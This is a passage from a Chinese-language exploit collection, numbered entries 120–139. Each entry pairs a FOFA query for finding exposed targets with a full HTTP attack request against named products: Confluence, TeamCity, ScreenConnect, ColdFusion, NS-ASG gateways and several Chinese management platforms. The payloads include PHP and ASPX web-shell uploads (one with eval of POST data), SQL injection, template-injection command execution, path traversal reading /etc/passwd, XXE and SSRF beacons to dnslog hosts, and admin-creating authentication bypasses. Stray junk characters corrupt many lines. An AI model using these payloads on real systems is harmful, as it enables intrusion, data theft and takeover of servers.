; P7 [. L% N3 \$ v0 t1 ~Connection: close
, d; W0 a$ }5 p; Z9 x8 w( @
0 }" P7 \' U" T6 g! z0 _4 j. z2 Q" Z6 n }src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
& _" N2 n7 J/ K4 ^1 m) X
a; }; o7 j2 [ @, Y' {/ E
0 L2 U: G1 ~+ N: r8 H9 ^1 @120. 北京百绰智能S40管理平台导入web.php任意文件上传" O' `; f1 H; R3 u8 S& u n
CVE-2024-12539 x. q: {6 ^; k- c
FOFA:title="Smart管理平台"
1 P3 Q7 j6 ~3 m! r# R* V' WPOST /useratte/web.php? HTTP/1.1: Y# B$ V S% @* S! Q6 g& ~9 N
Host: ip:port
* ^( H' [7 A, l/ L9 b" BCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db' M# z0 n+ O+ F* b3 Y. D, y
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
# k* ^4 d" s: g4 i: m; ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( t: Y' `7 w% R" H: v. ~1 o
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! j; m9 ?4 a1 D6 V f) g. U) tAccept-Encoding: gzip, deflate
! z8 n7 K' q9 J" F2 oContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
) i; B" M1 N4 d& l3 aContent-Length: 5974 }6 W5 V4 L' k- n, V( p! Q) ^9 D% w
Origin: https://ip:port1 g2 C0 X" D% A. x, L
Referer: https://ip:port/sysmanage/licence.php
5 s6 `$ M0 _( H, l2 j; N9 P. u) QUpgrade-Insecure-Requests: 1
. `# @" |) H4 @; c. M6 J9 kSec-Fetch-Dest: document& o9 g3 I8 b7 X0 `( o5 g4 V$ `3 L
Sec-Fetch-Mode: navigate1 |; S5 G- O; I* W/ e5 _* B
Sec-Fetch-Site: same-origin
# m# L/ m" y- XSec-Fetch-User: ?1
% O% `% d' h3 `7 _" BTe: trailers
# X5 u* k6 }) ~; VConnection: close
% W1 T* ~$ h: j) L( Z: V
2 q8 s9 l0 U6 p% `2 k& U1 q-----------------------------42328904123665875270630079328' `7 x3 T5 G P0 ]. f, A
Content-Disposition: form-data; name="file_upload"; filename="2.php"
1 r8 M6 u9 i+ N9 |+ A2 y0 lContent-Type: application/octet-stream* `! u ?% }8 ^
; _, B6 u" y5 t q+ \
<?php phpinfo()?>
3 h6 F6 v# A9 g0 R0 T- Z( d5 D, L-----------------------------42328904123665875270630079328
# Y. \$ z( _. C; J! V H4 E6 k, l( x* jContent-Disposition: form-data; name="id_type"
3 }$ F9 l/ a1 |0 I, T8 `- r; O" E
) E$ a y1 R. E8 Y1! a. \% u7 N7 h# s. z2 S$ z' ~7 }5 W
-----------------------------42328904123665875270630079328; i( T/ y, o' W9 R, ^; n2 e" f
Content-Disposition: form-data; name="1_ck"4 H% ~! F4 m* y% t( e, T( f( B
4 |7 L! U, O( a5 U6 t( e8 O o1_radhttp
" S1 e( i+ \+ I6 t9 K9 V8 f, [-----------------------------42328904123665875270630079328
. n R7 w6 n" X( XContent-Disposition: form-data; name="mode"$ g* S3 \" x2 E% ]
$ v) p. B/ `: H5 \7 X( G( G
import! `, W& Z. J5 }. ] q
-----------------------------42328904123665875270630079328! ?* {5 [7 r5 ]) T; b2 m
. T# r3 ?) s8 d; ]3 F5 G3 a$ h1 Z! o4 H4 W2 l% S" I
文件路径/upload/2.php7 F5 S" i j. [' c* u2 U- p
4 Y: b* V! f) K' I
121. 北京百绰智能S42管理平台userattestation.php任意文件上传6 v( Q0 n0 n- t$ @9 B; h
CVE-2024-19185 f' i! F# g+ h4 _; T# v0 J
FOFA:title="Smart管理平台", ?) [6 y' N9 x$ P/ D9 S: |" Q4 x
POST /useratte/userattestation.php HTTP/1.1
( u; x1 h0 k# V( g7 IHost: 192.168.40.130:8443: P% n/ j$ a! s( `% q6 A
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac502 m p( y0 h; U1 V' k5 v9 T0 a
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
; i/ @3 G2 a# }" W: k3 VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, _: u1 d% v8 ^0 `3 g* D+ v
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ P1 r1 U) R! S4 U
Accept-Encoding: gzip, deflate3 i& w! {# q+ v
Content-Type: multipart/form-data; boundary=---------------------------423289041236658752706300793280 F3 ~# S2 F' G8 m% y4 f7 A
Content-Length: 592
6 l' F! x$ A, SOrigin: https://192.168.40.130:84430 g) E8 ~7 F- ]. D% d
Upgrade-Insecure-Requests: 1: L0 y0 u4 Z! E( ?# M8 m/ {* X* @
Sec-Fetch-Dest: document: r" p* c! A/ I. G
Sec-Fetch-Mode: navigate9 ?. B# ?5 q* s0 o/ M# k
Sec-Fetch-Site: same-origin
5 Z+ p; b7 U9 O; P3 }6 i8 YSec-Fetch-User: ?1
2 o! A! l4 b4 y! U6 n; gTe: trailers7 J. p [) m; h1 R9 S
Connection: close
( ?2 ]& I3 W, \* s% B
+ a6 i& t1 [, c; P9 R-----------------------------42328904123665875270630079328" i3 E; {$ I- M+ a+ \
Content-Disposition: form-data; name="web_img"; filename="1.php"; a( j" v( A+ R- m- D7 v* J' q
Content-Type: application/octet-stream! I% h7 }! [3 }1 ?; o
; V4 {4 a0 X: r. {0 \* Y<?php phpinfo();?>
7 X0 R1 z& H# ^-----------------------------423289041236658752706300793280 X" L1 A, M) V, U
Content-Disposition: form-data; name="id_type"* c% x9 U! u4 Z3 W2 t8 d. U. r0 _
# r8 Q: h& H+ h( K' a; M$ h6 C, C1
1 R5 h* n7 S7 V4 o/ l" w-----------------------------42328904123665875270630079328' C+ I% ^; E4 A9 h7 M' V3 d
Content-Disposition: form-data; name="1_ck"
# i% J4 a0 i# x: s2 n
! n0 I4 u$ R" W2 f: N; ^1_radhttp
8 C l$ o' T+ o2 T& \4 C- n' X% p-----------------------------42328904123665875270630079328
* y% d$ Y, A6 t" l" o/ `Content-Disposition: form-data; name="hidwel"! Y+ \( E2 k6 p& k
3 n# Q7 v' k! G- S0 r1 Iset
4 z7 D/ }! d6 ^# P" n$ c2 z. f8 H/ Z-----------------------------42328904123665875270630079328
5 g9 T- h( q2 T$ C: K& A* \
2 i# N$ G' h, O
6 X) {& n6 J B+ o5 i$ m. Uboot/web/upload/weblogo/1.php* e# e1 C ~4 z7 \1 x' P, b
2 {% `! c9 G% [- Y( q/ n
122. 北京百绰智能s200管理平台/importexport.php sql注入
& g4 U( n5 l6 Y. L. z3 vCVE-2024-27718FOFA:title="Smart管理平台"
5 Z0 c" Y9 y4 d其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()* D$ \: V/ `: ?' v
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
9 O. a; c! L2 o* F, p s# r3 I, DHost: x.x.x.x
7 T& l% K( L P. |Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0: }+ {7 `9 ~1 f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.08 {! F# d# C2 ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 @ m, X$ j$ \: uAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- f# Z4 |; R/ D, n, [+ ~# dAccept-Encoding: gzip, deflate, br& X, c0 c1 Y/ u9 U( j
Upgrade-Insecure-Requests: 1
8 ~* k' V$ p' g i1 P4 V: X3 g' uSec-Fetch-Dest: document7 M& N' g4 Z/ w9 C' [
Sec-Fetch-Mode: navigate
- L- U" U" v/ x4 |9 kSec-Fetch-Site: none) `9 w) h. W) `+ g' N1 Y1 {- s
Sec-Fetch-User: ?1) {+ D4 z# w3 P5 k/ v8 \
Te: trailers
9 e! u7 f- G9 W1 vConnection: close
# r# w9 w9 n2 R
, O/ ?; U7 i$ ?; T$ ]/ D6 _0 }) o. ~. J4 ?6 Z; L
123. Atlassian Confluence 模板注入代码执行
C- E- b* _/ m( @, QFOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3": ]- d% ]$ f, g9 X7 e' s
POST /template/aui/text-inline.vm HTTP/1.1" M; Z$ R3 f7 M7 f/ c$ K- V
Host: localhost:8090! c \2 h) O- m$ O! E
Accept-Encoding: gzip, deflate, br
4 z( F( p0 V# d: a* j0 |8 E4 l, AAccept: */*
" g+ `- H4 O* c+ F4 t0 Y3 o1 m) {Accept-Language: en-US;q=0.9,en;q=0.8
1 _; n' m1 t6 d/ c3 t! ]0 E% KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.363 S) }; Q. t& G' G
Connection: close" u& ~8 A/ L$ P
Content-Type: application/x-www-form-urlencoded
+ v+ W- {. r0 `3 n1 j; H" ?, ^9 c5 r/ i. g+ T
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))9 e o# F8 C7 u+ l% |5 n
% B# [6 t0 M! P8 a' x0 T
& W' J7 p# i L; ~5 f: ]) r. ]; l4 x1 D$ R124. 湖南建研工程质量检测系统任意文件上传
* f& n" L1 B: h6 z( B; p3 | tFOFA:body="/Content/Theme/Standard/webSite/login.css"
+ s6 I0 M; A4 ?" rPOST /Scripts/admintool?type=updatefile HTTP/1.12 P+ h/ E9 [& z3 O s
Host: 192.168.40.130:8282& U: f7 G z7 o# V/ I# p0 ]
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
7 h) S' t Y8 z* ~$ z$ _! mContent-Length: 72, _. @) c; q5 q4 R) z7 u' l! @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
* D) Q( W$ S+ N% c& M$ AAccept-Encoding: gzip, deflate, br
7 n: Y% W% y7 s. PAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 q% p! q$ s) k# {" ^( f: F
Connection: close
5 `' T9 g( F+ H3 m: zContent-Type: application/x-www-form-urlencoded
% Q6 ~' h4 o3 @2 e
3 ~0 ]' `# l' X8 CfilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
4 B p) S+ [: O6 f, K
L4 W' P r% l) {4 H, x& L- u: k% ?4 L5 p1 G( ~( r
http://192.168.40.130:8282/Scripts/abcgcg.aspx) R5 J/ b4 K+ q; m- ?6 o
. r2 E7 N7 |; t6 Q6 H
125. ConnectWise ScreenConnect身份验证绕过$ F) p0 Q% h \
CVE-2024-1709
. `$ j2 V. d5 n! r$ jFOFA:icon_hash="-82958153"
! v( y9 |, c, p# m% _8 P) z% q" ]3 phttps://github.com/watchtowrlabs ... bypass-add-user-poc! L5 k' \) ?+ L5 ]$ _# Q2 b
) ]" |* }( f4 K& g7 c' g! u$ z* ~5 Q
5 E" Q$ W# ]- ?6 q" o/ g9 ~使用方法
9 H* K" Y' {( Z( K2 |python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
( U" {- _3 D/ j, G, A6 j( @4 ?) D/ K; x) w" O" ]
! {3 H9 l6 j4 ^& f$ Y& x) i/ _! ^
创建好用户后直接登录后台,可以执行系统命令。
P5 ]1 _1 b6 P; z& y# o& ~- l
" ~ @. ?9 d! a126. Aiohttp 路径遍历* |! @- `6 [7 Z8 j/ l ?/ l
FOFA:title=="ComfyUI"! Z. X5 c7 i# g- V
GET /static/../../../../../etc/passwd HTTP/1.1" G0 W6 v' I3 S8 ?* T
Host: x.x.x.x
7 _, j/ w% i! _User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.364 I" t E. @5 z- C; m
Connection: close
" }0 n( v( o# K% Y3 G. YAccept: */*
8 D8 j1 f5 Z4 oAccept-Language: en% o* f* ?$ j2 g/ `
Accept-Encoding: gzip- Y* N3 p0 [0 j8 n2 e! Q5 ]
( Z2 [1 h7 T" c( d2 a* @$ ^1 K% Q. s+ J7 X* _& ~4 O
127. 广联达Linkworks DataExchange.ashx XXE
8 c- V" g+ I; r* `$ ]' EFOFA:body="Services/Identification/login.ashx"
$ Y! H- s8 N( k; i$ R' MPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.15 z5 _' C0 c; Q
Host: 192.168.40.130:8888
7 P! p, w7 p" g$ A* t8 CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
0 p1 w7 z& w( h. R" vContent-Length: 415; ?4 ]3 F7 a s3 m; @, u
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) B5 b. V% s$ \
Accept-Encoding: gzip, deflate
+ J& t; _ g' |) M/ n1 U: EAccept-Language: zh-CN,zh;q=0.9
# S: j8 j$ S+ N ?1 j1 S5 J; ^: N* pConnection: close
. _0 w1 d2 Q6 q& vContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0/ j3 C0 x( t. v8 [ y
Purpose: prefetch
% N' F, Z$ h4 k: {# Y6 m8 NSec-Purpose: prefetch;prerender" C; E9 Q* Y! Y& A. r
! D2 \, _% o/ N: }
------WebKitFormBoundaryJGgV5l5ta05yAIe0
/ b: h. v1 x5 w6 q9 `6 T7 OContent-Disposition: form-data;name="SystemName"
; w& F; X/ P8 A8 B
, ~/ Q( x* ^- eBIM
5 |2 L3 z X4 p; K# g# n9 _3 l# ]; v------WebKitFormBoundaryJGgV5l5ta05yAIe0! [4 m, R9 K. n# V6 ?' j
Content-Disposition: form-data;name="Params"
- y2 ]! o* |$ A2 jContent-Type: text/plain
1 l) J/ V5 s. P& ]% V' n
0 `' n- W! H6 s; M& j<?xml version="1.0" encoding="UTF-8"?>1 X A% d( J+ g+ i
<!DOCTYPE test [
' g* H \0 ]0 }0 M1 P" D' M! y; K" R. l<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">: q1 k/ F4 R; y; I* `6 Y: @
]
6 O, h- Y* \+ r- L/ p>4 S; }9 d; ^3 P
<test>&t;</test>
( C! n* y) i+ [3 \# i9 `" I------WebKitFormBoundaryJGgV5l5ta05yAIe0--# [$ ?, a! ~1 c+ P3 {* D
3 e3 d& h6 O- s$ B8 e
3 F- S+ n6 x- w+ C
. u# J" {! q& t( p128. Adobe ColdFusion 反序列化
( C2 Z9 V% X# h8 P# t2 g$ o0 yCVE-2023-38203" m2 P; Q$ t# i# J5 C+ p' H
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
5 F% U7 W3 `. p6 v3 vFOFA:app="Adobe-ColdFusion"
! H0 ?- D6 o; X0 a6 R1 V5 v& sPAYLOAD7 B; K) c1 F" Z. U- o4 `' c3 t+ X
4 [- o4 u6 C. @! A0 J129. Adobe ColdFusion 任意文件读取
. p" Q4 ]6 B0 O+ }# gCVE-2024-20767
- N; Z" y2 u; O2 QFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
$ L9 g% r, N" \6 R4 k, s" V1 V/ u/ z4 x第一步,获取uuid6 c' a1 Z t9 N" R5 R3 z; f# ^
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1% W* C3 z* o. w) T+ i: u
Host: x.x.x.x/ C Y: s, \5 z; s: d0 [" Z$ ]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
- a& }; a- q# rAccept: */*
2 O1 s' y, p) UAccept-Encoding: gzip, deflate
, _: x S- r. c' ~+ pConnection: close5 Z! ~* g' H) w ^% w' y, `
4 f, b( p1 n+ H# [ Z
. W6 D8 p$ \3 u8 M# R" z
第二步,读取/etc/passwd文件8 Y2 e1 K0 B/ h$ L
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1; _' y* E, p0 e, S
Host: x.x.x.x
8 `# T& I$ a6 f3 dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36& _1 X: q$ K0 ] s1 v$ h3 Z+ j/ `
Accept: */*4 {7 o+ w3 K7 a5 `- _1 B; C
Accept-Encoding: gzip, deflate) v9 g7 \; `# F7 n- j# E6 p
Connection: close* Z# e8 S3 m4 t+ p$ K) l/ e6 e
uuid: 85f60018-a654-4410-a783-f81cbd5000b9
1 B2 G" y/ ~- q1 t4 v& \+ H
% I. x+ s0 t( N2 i* q4 A$ F( h2 k
130. Laykefu客服系统任意文件上传0 p9 t8 t4 i4 J( A
FOFA:icon_hash="-334624619"
2 }- K. v3 B! F0 l OPOST /admin/users/upavatar.html HTTP/1.1
4 g% L6 h: `7 yHost: 127.0.0.1 ~3 `4 X! D& V
Accept: application/json, text/javascript, */*; q=0.01
. U. y7 |' M1 pX-Requested-With: XMLHttpRequest' A) R Z/ I/ l1 i3 k
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.267 F& y( g- p2 u- B3 b' q5 s# s
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR, [* M" Z+ j% U( R- u `, Z8 B: Z
Accept-Encoding: gzip, deflate
& |4 A$ }: v" g6 A! SAccept-Language: zh-CN,zh;q=0.9
- c1 Z8 |4 ~( {$ k0 XCookie: user_name=1; user_id=3
. d& U8 e+ w, L. W! p. k' j8 Q5 y* c! RConnection: close6 v8 a/ D; r, L/ X E
3 y# R% j( N5 e" W9 r
------WebKitFormBoundary3OCVBiwBVsNuB2kR e1 v$ c6 D9 c: H' `. T( f
Content-Disposition: form-data; name="file"; filename="1.php"
9 O; q8 {2 p1 D) BContent-Type: image/png- \1 s$ E% r' p) o% a
& Z) U# G8 C. n0 i
<?php phpinfo();@eval($_POST['sec']);?>
4 r2 _% c) P* R2 |9 X |. G------WebKitFormBoundary3OCVBiwBVsNuB2kR--
/ |8 C% T, J& d8 N8 ?2 f5 Y! j
8 }& O7 t$ c9 Z+ _. l( I, o
7 [% R) f. x4 F- v/ d9 a. i$ t {) H131. Mini-Tmall <=20231017 SQL注入: w* f' \; w1 C2 m/ K S
FOFA:icon_hash="-2087517259"
( L y2 H" Z" i ~3 L7 S7 k后台地址:http://localhost:8080/tmall/admin0 R. K; ]' f+ {5 b9 h/ g- c; b4 [0 e* n
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
6 j: {+ ~& T1 C- A5 `" o8 G3 _* C" K+ l# K% t0 O; Q1 s* m
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过) o# b/ A: ]# P& @% h! `6 r
CVE-2024-27198 h& R% B9 f1 q* j# E: c) L
FOFA:body="Log in to TeamCity", {8 X; P6 d, h3 ?: t2 |
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
0 W. G9 o" q. G& K7 `6 wHost: 192.168.40.130:81119 p) m; K g& c; K- ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
7 C1 r. u7 k X2 u7 SAccept: */*
2 n+ I+ d6 K, g6 O+ v4 ~* qContent-Type: application/json" H- A8 G/ _; F3 W4 n# A9 P
Accept-Encoding: gzip, deflate7 E. d7 `! C K1 w
; n) ?/ O) ^- S( u. C7 X" \
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
. \8 O* a3 x/ p
+ t% V# W o% }5 E# M% _' f
4 h$ }1 z- l- _% Y! W" R% VCVE-2024-27199" P5 Y5 z" h/ N) l8 v
/res/../admin/diagnostic.jsp* n; @; |0 j4 l" ~& o& W* M
/.well-known/acme-challenge/../../admin/diagnostic.jsp
5 V2 h- g8 N3 b# N4 S/update/../admin/diagnostic.jsp% q" M: C% @" f( Y: @( x
4 ~0 h; S8 t6 A) a6 j
5 d$ W. p7 z# K# V! n7 m$ V$ E1 nCVE-2024-27198-RCE.py+ b' P+ x. }9 B* g
1 z) M1 c( P4 c( D: t
133. H5 云商城 file.php 文件上传
v2 e' O+ V/ l _ R. bFOFA:body="/public/qbsp.php"9 x- X! B+ m' L' V% O* Y, ?
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
/ |/ b. p3 m) oHost: your-ip: A, i9 @8 Z+ i' ]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
5 V* l7 g; t! C4 f2 V% [Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
% Q* D; r6 v' p) N/ Z3 O/ O
& N6 } m a- d+ v------WebKitFormBoundaryFQqYtrIWb8iBxUCx
) \ k0 {7 F6 h7 G' T' o' E' j; {Content-Disposition: form-data; name="file"; filename="rce.php"
0 \' y+ @6 h* X: X" aContent-Type: application/octet-stream
- r" h) A+ M7 K* Q- f 5 r- t3 D, }1 h; J
<?php system("cat /etc/passwd");unlink(__FILE__);?>
5 K/ T W, p; M4 {( c! A; B' y------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
3 X) B( F- o0 A7 a, m6 J! ^' V$ D& {) [. e* t
' g; p) M2 X! N
# X' v" [! L% y8 B' [# {134. 网康NS-ASG应用安全网关index.php sql注入/ s7 g) V$ A" \
CVE-2024-2330, z- h* J. Q |4 V0 d
Netentsec NS-ASG Application Security Gateway 6.3版本
# J7 J" z! d5 v& f# EFOFA:app="网康科技-NS-ASG安全网关"
: E! D3 O, I: X& f. UPOST /protocol/index.php HTTP/1.17 Y3 N4 h3 i L/ o% k7 P
Host: x.x.x.x- Q4 Q: z3 T9 H- @% P [0 Z
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
$ h9 ^! K2 v8 p! EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
! o5 L2 u; p. e8 |! X0 ^# l N1 CAccept: */*7 a4 a& F& w4 q: H7 d! O
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* y+ L/ }" S1 q0 _$ m R% p1 jAccept-Encoding: gzip, deflate
4 y1 H8 i% A& q: Y) \8 ?Sec-Fetch-Dest: empty
/ z8 i8 t& B; U' W# V) \. I: B5 R! MSec-Fetch-Mode: cors
* D0 n7 l3 Q4 f) O4 @Sec-Fetch-Site: same-origin
% ~, E' T3 i* U6 u5 V7 @3 ?. PTe: trailers1 e) [; k3 G& V4 n1 r1 |7 J, m
Connection: close& ]" ]1 P( n$ p3 d6 \' x
Content-Type: application/x-www-form-urlencoded
) \+ l9 `( {3 E4 H5 I. w4 GContent-Length: 263
: R2 S4 j' ~% D$ k O1 F6 p$ j- {0 \: B0 O
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
9 r1 s9 L" k3 o0 A
- t1 q$ A: s, R% g. y* H7 j" _, C& L2 b6 q
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
. h; V d0 k# t; ]4 e4 W( a! iCVE-2024-2022* M0 R2 N) ]' |/ l, n" X, V! P
Netentsec NS-ASG Application Security Gateway 6.3版本. V) a1 q1 |- u, x2 f2 G
FOFA:app="网康科技-NS-ASG安全网关"
6 j) x; t4 ~7 I* k* sGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
4 l. \7 d# ~# F( q! u/ T! XHost: x.x.x.x* e2 F% h7 T! r9 f9 t8 T" H8 M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
4 m* K0 j5 m3 d# z6 C" m+ aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 ], t; O7 L0 x/ G$ sAccept-Encoding: gzip, deflate
3 S+ p, g6 T7 }1 d2 \Accept-Language: zh-CN,zh;q=0.9
) o5 a1 Q3 {3 ?4 ~# G1 ? @$ F5 JConnection: close4 j: N7 T/ y2 J- l
& W8 T1 Z9 X; R( q9 I" m) Y" v
# Z* O, _; n' V$ Y! w! y/ M' a
136. NextChat cors SSRF
7 n, \: l; q+ a! M# t$ yCVE-2023-49785: i- G. v$ |$ Q7 ]. J
FOFA:title="NextChat"
$ m; x# r% t8 I, SGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1, \5 p# R7 ?& {2 l% m7 S \
Host: x.x.x.x:100006 A. h2 I9 ^" d1 ~1 T: C
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36; m1 R, x3 {+ f" Z1 r8 ]
Connection: close
0 ^3 U$ d" F5 OAccept: */*; t' m. A! ]; u- m3 d! w4 p
Accept-Language: en! O( \# W; A8 ^7 C6 O: o" a
Accept-Encoding: gzip+ D2 d# `: P8 ?% V+ O. d3 y
1 [4 M& y" G2 x3 I( i" O* N! ~4 m! ~9 x* q
137. 福建科立迅通信指挥调度平台down_file.php sql注入6 n, `) `* T# p1 T
CVE-2024-2620
' I# M: q1 O" i& @FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
2 f8 [* K8 \% u) qGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1! u, \8 c2 X# P, O
Host: x.x.x.x
2 P, `: d( I: c9 F- p& ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
1 A; Y" @/ u1 e. oAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.88 |2 W2 r4 w( z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' l) P& c, ?8 j& oAccept-Encoding: gzip, deflate, br' e4 O" u- F, V5 ~7 e" d
Connection: close2 [* r$ e& r3 b9 [& A4 G# ~
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj( y3 @$ o; v0 ?5 x5 t* @
Upgrade-Insecure-Requests: 1, I% ~2 ^6 m5 G3 s
5 B5 H, N, {& w4 D: ^9 N& h ~8 F" H4 i' v/ \4 U9 a5 d R$ k
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
- V x% W) d0 B9 KCVE-2024-26213 Y7 D( N5 d4 L% F& X. J9 j
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"& o! I/ }8 H# ?- j
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
1 d9 G4 o' x. _% oHost: x.x.x.x9 s" v" Q6 B9 G8 x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.01 s+ a$ ~4 j% v: h" f. ?" W& S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8$ e( I! W( [" I3 r2 `5 C* `9 D
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 G% b4 j/ L7 b* I
Accept-Encoding: gzip, deflate, br
+ U: j- }& R0 bConnection: close
+ ?$ I# ^& A7 RUpgrade-Insecure-Requests: 1' R7 q9 a0 g H7 \* G# T+ E# E" v
. _" j# k# Q, H1 _& X' ~- o3 Q
0 Q# r$ v; w# t4 C& Y. u9 y
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
